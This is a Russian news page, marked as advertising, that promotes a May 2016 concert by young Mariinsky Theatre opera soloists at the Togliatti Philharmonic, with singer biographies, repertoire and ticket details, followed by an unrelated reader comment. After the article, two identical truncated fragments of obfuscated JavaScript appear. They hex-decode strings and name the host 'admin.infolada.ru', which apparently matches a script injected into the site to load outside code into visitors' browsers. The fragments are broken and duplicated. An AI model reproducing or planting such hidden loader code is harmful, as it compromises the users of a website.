27 апреля 2016 09:15
4984

Оперные хиты исполнят молодые солисты Мариинского театра

7 мая в 18.00 в Тольяттинской филармонии любители классического вокала смогут насладиться замечательным концертом в рамках региональной программы XV Московского Пасхального фестиваля. В этот вечер покорять публику будут солисты Академии молодых оперных певцов Мариинского театра Антонина Весенина (сопрано), Ирина Шишкова (меццо-сопрано) и Роман Люлькин (бас). Они впервые выступят в Тольятти.

Первый концерт в рамках Московского Пасхального фестиваля состоялся в Тольятти в 2007 году. Это было незабываемое выступление симфонического оркестра Мариинского театра под управлением народного артиста РФ Валерия Гергиева. Тогда Симфонический оркестр Тольяттинской филармонии и получил личное приглашение Гергиева принимать ежегодное участие в региональной программе Пасхального фестиваля.

7 мая в исполнении солистов Академии молодых певцов Мариинского театра и Симфонического оркестра Тольяттинской филармонии прозвучат популярные арии из опер и оперетт, таких как «Севильский цирюльник» Дж. Россини, «Манфред» Дж. Верди, «Кармен» Ж. Бизе, «Фауст» Ш. Гуно, «Самсон и Далила» К. Сен-Санса, «Евгений Онегин» П. Чайковского, «Снегурочка» и «Царская невеста» Н. Римского-Корсакова, «Летучая мышь» И. Штрауса. Мы услышим тот самый репертуар, что смело можно назвать оперными хитами!

Академия молодых оперных певцов была образована в Мариинском театре в 1998 году. Руководит Академией Лариса Гергиева – широко известный деятель музыкального искусства, педагог с мировым именем, генеральный директор Международного конкурса им. Н. А. Римского-Корсакова.

В период совершенствования в Академии  молодые певцы принимают самое активное участие в оперных постановках Мариинского театра.

Голос Антонины Весениной (сопрано) зазвучал на весь мир  на XV Международном конкурсе им. П.И.Чайковского в 2015 году. Ее ярчайшие выступления в разных турах конкурса были восторженно встречены зрителями и судьями, в результате чего Антонина вошла в число лауреатов престижного музыкального состязания.

Антонина Весенина в сезоне 2010-2011 являлась солисткой камерного музыкального театра «Санктъ-Петербургъ-опера», где исполнила партию Джильды в опере «Риголетто», Женевьевы в опере «Сестра Анжелика», Луции в «Поругании Лукреции» Б. Бриттена. С 2011 года — солистка Академии молодых оперных певцов Мариинского театра. Ведет активную концертную деятельность. Принимала участие в мастер-классах Е. Образцовой, Л. Гергиевой. Выступала в рамках концертов Академии молодых оперных певцов в Великобритании.

Ирина Шишкова (меццо-сопрано) родилась в Санкт-Петербурге. В 2008 году дебютировала на сцене Новосибирского государственного академического театра оперы и балета в заглавной партии в опере Бизе «Кармен». На сцене Новосибирского театра также исполнила партии Полины и Миловзора в «Пиковой даме» П. И. Чайковского. В 2011 году Ирина дебютировала на сцене Латвийской национальной оперы в партии Ольги («Евгений Онегин») и на фестивале Crescendo (художественный руководитель Денис Мацуев). В этом же году выступила на сцене Кеннеди-центра (Вашингтон) с Уральским филармоническим оркестром под управлением Дмитрия Лисса.

Роман Люлькин (бас)закончил Московскую международную киношколу и Школу-студию МХАТ. Лауреат III Международного конкурса вокалистов им. Павла Лисициана (Владикавказ, 2013), VI Всероссийского конкурса молодых исполнителей им. Надежды Обуховой (Липецк, 2014). Дипломант IX Международного конкурса молодых оперных певцов Елены Образцовой (Санкт-Петербург, 2013).

Принимал участие в концертах: «Вечера в Английском зале» (Санкт-Петербург, 2014) «Русские вторники» (Bruknerhaus, Линц, Австрия, 2014), «Посольство мастерства» (Вена, Австрия, 2014).

Окунитесь в богатство оперной музыки Московского Пасхального фестиваля!

Цена билетов – доступная, 200-500 рублей. Заказ билетов по телефону 222-600 (касса) и на сайте филармонии www.filarman.ru.

Возрастное ограничение: 6+

Материал размещен на правах рекламы

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "admin.infolada.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "admin.infolada.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Источник: TLT.ru

Если вы нашли ошибку, пожалуйста, выделите фрагмент текста и нажмите левый Ctrl+Enter.

Для комментирования войдите через любую соц-сеть:

У Вас есть свободные деньги?

Загрузка ... Загрузка ...
Наталия Сорокина 16 апреля 19:13
Представляю как сложно водителю маршрутки или автобуса вставать в полпятого утра, чтобы к полшестому уже подвести свой транспорт к остановке!... Физиологично для организма это тяжело и для семей самих водителей... Смотрю в окно квартиры по утрам - первый транспорт подъезжает к остановке ("Торпедо") уже в 5:30... Народу на остановке к этому времени человек пять - восемь... Может быть пересмотреть расписание, как для производств, так и для транспорта по-другому?!... На производстве сделать пересменки не в 6:00 - 7:00 часов, а в 8:00 часов... Конечно же, потребуется ещё одна рабочая смена на производстве, зато психоэмоциональное здоровье работников не будет нарушаться анти-физиологичным расписанием труда!... Тогда и у водителей транспорта расписание работы начнётся не с полшестого, а с полвосьмого времени... Тогда это устроит, как рабочих, так и водителей города, меньше будет озлобленности от недосыпа у людей!

Сообщить об опечатке

Текст, который будет отправлен нашим редакторам: